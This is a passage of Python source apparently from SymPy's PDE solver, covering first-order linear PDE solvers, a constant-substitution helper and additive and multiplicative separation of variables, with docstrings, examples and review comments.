        return s is S.Zero, s
    raise NotImplementedError(filldedent('''
        Unable to test if %s is a solution to %s.''' % (sol, pde)))
def pde_1st_linear_constant_coeff_homogeneous(eq, func, order, match, solvefun):
    r"""
    Solves a first order linear homogeneous
    partial differential equation with constant coefficients.

    The PDE has the form

    .. math:: a \frac{df(x,y)}{dx} + b \frac{df(x,y)}{dy} + c f(x,y) = 0

    with constants `a`, `b`, `c`.  The general solution is

    .. math:: f(x, y) = F(b x - a y)
              e^{-c (a x + b y)/(a^{2} + b^{2})}

    where `F` is the arbitrary function supplied as ``solvefun``.

    Examples
    ========
    >>> from sympy import pdsolve
    >>> from sympy import Function, diff, pprint
    >>> from sympy.abc import x,y
    >>> f = Function('f')
    >>> pdsolve(f(x,y) + f(x,y).diff(x) + f(x,y).diff(y))
    Eq(f(x, y), F(x - y)*exp(-x/2 - y/2))

    References
    ==========
    - Viktor Grigoryan, "Partial Differential Equations"
      Math 124A - Fall 2010, pp.7
    """
    # TODO : Only homogeneous first order linear PDEs in two variables are
    # handled for now; once systems of ODEs are supported this can be
    # extended to n variables.
    f = func.func
    x = func.args[0]
    y = func.args[1]
    bb = match[match['b']]   # coefficient of f_x
    cc = match[match['c']]   # coefficient of f_y
    dd = match[match['d']]   # coefficient of f
    norm = bb**2 + cc**2
    decay = exp(-S(dd)*(bb*x + cc*y)/norm)
    return Eq(f(x, y), decay*solvefun(cc*x - bb*y))
def pde_1st_linear_constant_coeff(eq, func, order, match, solvefun):
    r"""
    Solves a first order linear partial differential equation
    with constant coefficients.

    The PDE has the form

    .. math:: a \frac{df(x,y)}{dx} + b \frac{df(x,y)}{dy} + c f(x,y) = G(x,y)

    with constants `a`, `b`, `c` and an arbitrary right-hand side
    `G(x, y)`.  The solution is constructed in the characteristic
    coordinates `\xi = a x + b y`, `\eta = b x - a y`, where the PDE
    becomes a linear first order ODE in `\xi` solved with an
    integrating factor; the remaining quadrature is returned as an
    unevaluated Integral (evaluated later by _handle_Integral unless
    the "_Integral" hint was requested).

    Examples
    ========
    >>> from sympy.solvers.pde import pdsolve
    >>> from sympy import Function, diff, pprint, exp
    >>> from sympy.abc import x,y
    >>> f = Function('f')
    >>> eq = -2*f(x,y).diff(x) + 4*f(x,y).diff(y) + 5*f(x,y) - exp(x + 3*y)
    >>> pdsolve(eq)
    Eq(f(x, y), (F(4*x + 2*y) + exp(x/2 + 4*y)/15)*exp(x/2 - y))

    References
    ==========
    - Viktor Grigoryan, "Partial Differential Equations"
      Math 124A - Fall 2010, pp.7
    """
    # TODO : Only first order linear PDEs in two variables are handled for
    # now; once systems of ODEs are supported this can be extended.
    xi, eta = symbols("xi eta")
    f = func.func
    x = func.args[0]
    y = func.args[1]
    bb = match[match['b']]   # coefficient of f_x
    cc = match[match['c']]   # coefficient of f_y
    dd = match[match['d']]   # coefficient of f
    g = -match[match['e']]   # right-hand side G(x, y)
    norm = bb**2 + cc**2
    # Integrating factor along the characteristic coordinate xi.
    expterm = exp(-S(dd)/norm*xi)
    # Express (x, y) in the rotated coordinates (xi, eta).
    coords = solve((bb*x + cc*y - xi, cc*x - bb*y - eta), x, y)
    # Particular part.  The Integral stays unevaluated in terms of xi;
    # doit() happens later in _handle_Integral.
    genterm = (1/S(norm))*Integral(
        (1/expterm*g).subs(coords), (xi, bb*x + cc*y))
    homogeneous = solvefun(eta)
    return Eq(f(x, y), Subs(expterm*(homogeneous + genterm),
                            (eta, xi), (cc*x - bb*y, bb*x + cc*y)))
def pde_1st_linear_variable_coeff(eq, func, order, match, solvefun):
    r"""
    Solves a first order linear partial differential equation
    with variable coefficients. The general form of this partial differential equation is
    .. math:: a(x, y) f(x, y) + b(x, y) \frac{df(x, y)}{dx}
                + c(x, y) \frac{df(x, y)}{dy} - G(x, y)
    where `a(x, y)`, `b(x, y)`, `c(x, y)` and `G(x, y)` are arbitrary functions
    in `x` and `y`. This PDE is converted into an ODE by making the following transformation.
    1] `\xi` as `x`
    2] `\eta` as the constant in the solution to the differential equation
    `\frac{dy}{dx} = \frac{c}{b}`
    Making the following substitutions reduces it to the linear ODE
    .. math:: b(\xi, \eta)\frac{du}{d\xi} + a(\xi, \eta)u - G(\xi, \eta) = 0
    which can be solved using dsolve.
    The general form of this PDE is::
    >>> from sympy.solvers.pde import pdsolve
    >>> from sympy.abc import x, y
    >>> from sympy import Function, pprint
    >>> a, b, c, G, f= [Function(i) for i in ['a', 'b', 'c', 'G', 'f']]
    >>> u = f(x,y)
    >>> ux = u.diff(x)
    >>> uy = u.diff(y)
    >>> genform = a(x, y)*u + b(x, y)*ux + c(x, y)*uy - G(x,y)
    >>> pprint(genform)
    d d
    -G(x, y) + a(x, y)*f(x, y) + b(x, y)*--(f(x, y)) + c(x, y)*--(f(x, y))
    dx dy
    Examples
    ========
    >>> from sympy.solvers.pde import pdsolve
    >>> from sympy import Function, diff, pprint, exp
    >>> from sympy.abc import x,y
    >>> f = Function('f')
    >>> u = f(x, y)
    >>> eq = x*(u.diff(x)) - y*(u.diff(y)) + y**2*u - y**2
    >>> pdsolve(eq)
    Eq(f(x, y), F(x*y)*exp(y**2/2) + 1)
    References
    ==========
    - Viktor Grigoryan, "Partial Differential Equations"
    Math 124A - Fall 2010, pp.7
    """
    from sympy.integrals.integrals import integrate
    from sympy.solvers.ode import dsolve
    xi, eta = symbols("xi eta")
    f = func.func
    x = func.args[0]
    y = func.args[1]
    # Matched coefficients (the match dict maps the Wild objects stored
    # under the string keys to the actual expressions).
    b = match[match['b']]   # coefficient of f_x
    c = match[match['c']]   # coefficient of f_y
    d = match[match['d']]   # coefficient of f
    e = -match[match['e']]  # right-hand side G(x, y)
    if not d:
        # To deal with cases like b*ux = e or c*uy = e
        if not (b and c):
            if c:
                try:
                    tsol = integrate(e/c, y)
                except NotImplementedError:
                    raise NotImplementedError("Unable to find a solution"
                        " due to inability of integrate")
                else:
                    return Eq(f(x,y), solvefun(x) + tsol)
            if b:
                try:
                    tsol = integrate(e/b, x)
                except NotImplementedError:
                    raise NotImplementedError("Unable to find a solution"
                        " due to inability of integrate")
                else:
                    return Eq(f(x,y), solvefun(y) + tsol)
    if not c:
        # To deal with cases when c is 0, a simpler method is used.
        # The PDE reduces to b*(u.diff(x)) + d*u = e, which is a linear ODE in x
        plode = f(x).diff(x)*b + d*f(x) - e
        sol = dsolve(plode, f(x))
        # Integration constants introduced by dsolve become the arbitrary
        # function of the other variable.
        syms = sol.free_symbols - plode.free_symbols - {x, y}
        rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, y)
        return Eq(f(x, y), rhs)
    if not b:
        # To deal with cases when b is 0, a simpler method is used.
        # The PDE reduces to c*(u.diff(y)) + d*u = e, which is a linear ODE in y
        plode = f(y).diff(y)*c + d*f(y) - e
        sol = dsolve(plode, f(y))
        syms = sol.free_symbols - plode.free_symbols - {x, y}
        rhs = _simplify_variable_coeff(sol.rhs, syms, solvefun, x)
        return Eq(f(x, y), rhs)
    # General case: find the characteristic curves y(x) from dy/dx = c/b;
    # 'eta' labels the constant of integration of that family.
    dummy = Function('d')
    h = (c/b).subs(y, dummy(x))
    sol = dsolve(dummy(x).diff(x) - h, dummy(x))
    if isinstance(sol, list):
        sol = sol[0]
    solsym = sol.free_symbols - h.free_symbols - {x, y}
    if len(solsym) == 1:
        solsym = solsym.pop()
        # Solve for the constant and then for y in terms of (x, eta),
        # reducing the PDE to a 1st-order linear ODE in x along each
        # characteristic.
        etat = (solve(sol, solsym)[0]).subs(dummy(x), y)
        ysub = solve(eta - etat, y)[0]
        deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)
        final = (dsolve(deq, f(x), hint='1st_linear')).rhs
        if isinstance(final, list):
            final = final[0]
        finsyms = final.free_symbols - deq.free_symbols - {x, y}
        rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)
        return Eq(f(x, y), rhs)
    else:
        raise NotImplementedError("Cannot solve the partial differential equation due"
                " to inability of constantsimp")
def _simplify_variable_coeff(sol, syms, func, funcarg):
    r"""
    Helper function to replace constants by functions in 1st_linear_variable_coeff

    Each integration constant in ``syms`` is replaced by ``func(funcarg)``
    (the arbitrary function of the characteristic variable); any leftover
    ``eta`` placeholder is then substituted by ``funcarg`` and the result
    simplified.
    """
    eta = Symbol("eta")
    if len(syms) == 1:
        sym = syms.pop()
        final = sol.subs(sym, func(funcarg))
    else:
        # NOTE(review): each iteration substitutes into the *original* sol,
        # so only the last constant's substitution survives, and an empty
        # syms would leave `final` unbound.  Behavior preserved as-is --
        # confirm whether multiple constants can actually reach this path.
        # (Dead code that built unused per-constant Function objects has
        # been removed; it never affected the result.)
        for sym in syms:
            final = sol.subs(sym, func(funcarg))
    return simplify(final.subs(eta, funcarg))
def pde_separate(eq, fun, sep, strategy='mul'):
    """Separate variables in partial differential equation either by additive
    or multiplicative separation approach. It tries to rewrite an equation so
    that one of the specified variables occurs on a different side of the
    equation than the others.
    :param eq: Partial differential equation
    :param fun: Original function F(x, y, z)
    :param sep: List of separated functions [X(x), u(y, z)]
    :param strategy: Separation strategy. You can choose between additive
        separation ('add') and multiplicative separation ('mul') which is
        default.
    :raises ValueError: for an unknown strategy, mismatched or duplicated
        variables, or an Equality whose right-hand side is not 0.
    Returns ``[lhs, rhs]`` on success or ``None`` when separation fails.
    Examples
    ========
    >>> from sympy import E, Eq, Function, pde_separate, Derivative as D
    >>> from sympy.abc import x, t
    >>> u, X, T = map(Function, 'uXT')
    >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
    >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')
    [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
    >>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))
    >>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')
    [Derivative(X(x), x, x)/X(x), Derivative(T(t), t, t)/T(t)]
    See Also
    ========
    pde_separate_add, pde_separate_mul
    """
    do_add = False
    if strategy == 'add':
        do_add = True
    elif strategy == 'mul':
        do_add = False
    else:
        # BUG FIX: this was `assert ValueError(...)`, which always passes
        # (an exception instance is truthy), silently treating any unknown
        # strategy as multiplicative.  Raise the error instead.
        raise ValueError('Unknown strategy: %s' % strategy)
    # Normalise the input to an Eq(<expr>, 0) form.
    if isinstance(eq, Equality):
        if eq.rhs != 0:
            return pde_separate(Eq(eq.lhs - eq.rhs, 0), fun, sep, strategy)
    else:
        return pde_separate(Eq(eq, 0), fun, sep, strategy)
    if eq.rhs != 0:
        raise ValueError("Value should be 0")
    # Handle arguments
    orig_args = list(fun.args)
    subs_args = []
    for s in sep:
        for j in range(0, len(s.args)):
            subs_args.append(s.args[j])
    # The separable ansatz: sum or product of the pieces in sep.
    if do_add:
        functions = reduce(operator.add, sep)
    else:
        functions = reduce(operator.mul, sep)
    # Check whether variables match
    if len(subs_args) != len(orig_args):
        raise ValueError("Variable counts do not match")
    # Check for duplicate arguments like [X(x), u(x, y)]
    if has_dups(subs_args):
        raise ValueError("Duplicate substitution arguments detected")
    # Check whether the variables match
    if set(orig_args) != set(subs_args):
        raise ValueError("Arguments do not match")
    # Substitute original function with separated...
    result = eq.lhs.subs(fun, functions).doit()
    # Divide by terms when doing multiplicative separation
    if not do_add:
        eq = 0
        for i in result.args:
            eq += i/functions
        result = eq
    # Separate the first substitution variable from the rest.
    svar = subs_args[0]
    dvar = subs_args[1:]
    return _separate(result, svar, dvar)
def pde_separate_add(eq, fun, sep):
    """Search for an additively separable form of a PDE.

    Thin wrapper around :func:`pde_separate` with ``strategy='add'``:
    for independent variables x, y, z and dependent variable w, it
    looks for a solution of the shape `w(x, y, z) = X(x) + u(y, z)`.

    Examples
    ========
    >>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D
    >>> from sympy.abc import x, t
    >>> u, X, T = map(Function, 'uXT')
    >>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
    >>> pde_separate_add(eq, u(x, t), [X(x), T(t)])
    [exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
    """
    return pde_separate(eq, fun, sep, strategy='add')
def pde_separate_mul(eq, fun, sep):
    """Search for a multiplicatively separable form of a PDE.

    Thin wrapper around :func:`pde_separate` with ``strategy='mul'``:
    for independent variables x, y, z and dependent variable w, it
    looks for a solution of the shape `w(x, y, z) = X(x)*u(y, z)`.

    Examples
    ========
    >>> from sympy import Function, Eq, pde_separate_mul, Derivative as D
    >>> from sympy.abc import x, y
    >>> u, X, Y = map(Function, 'uXY')
    >>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))
    >>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])
    [Derivative(X(x), x, x)/X(x), Derivative(Y(y), y, y)/Y(y)]
    """
    return pde_separate(eq, fun, sep, strategy='mul')
def _separate(eq, dep, others):
    """Separate expression into two parts based on dependencies of variables.

    ``dep`` is the variable being isolated; ``others`` are the remaining
    variables.  Returns ``[lhs, rhs]`` where ``lhs`` is free of ``others``
    and ``rhs`` is free of ``dep``, or ``None`` when no such split exists.
    """
    # FIRST PASS
    # Extract derivatives depending our separable variable...
    terms = set()
    for term in eq.args:
        if term.is_Mul:
            for i in term.args:
                if i.is_Derivative and not i.has(*others):
                    terms.add(term)
                    continue
        elif term.is_Derivative and not term.has(*others):
            terms.add(term)
    # Find the factor that we need to divide by
    div = set()
    for term in terms:
        ext, sep = term.expand().as_independent(dep)
        # Failed?
        if sep.has(*others):
            return None
        div.add(ext)
    # FIXME: Find lcm() of all the divisors and divide with it, instead of
    # current hack :(
    # https://github.com/sympy/sympy/issues/4597
    if len(div) > 0:
        # Divide every term of eq by each collected factor and rebuild.
        final = 0
        for term in eq.args:
            eqn = 0
            for i in div:
                eqn += term / i
            final += simplify(eqn)
        eq = final
    # SECOND PASS - separate the derivatives
    div = set()
    lhs = rhs = 0
    for term in eq.args:
        # Check, whether we have already term with independent variable...
        if not term.has(*others):
            lhs += term
            continue
        # ...otherwise, try to separate
        temp, sep = term.expand().as_independent(dep)
        # Failed?
        if sep.has(*others):
            return None
        # Extract the divisors
        div.add(sep)
        # Move the term to the right-hand side (sign flipped).
        rhs -= term.expand()
    # Do the division
    fulldiv = reduce(operator.add, div)
    lhs = simplify(lhs/fulldiv).expand()
    rhs = simplify(rhs/fulldiv).expand()
    # ...and check whether we were successful :)
    if lhs.has(*others) or rhs.has(dep):
        return None
    return [lhs, rhs]
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.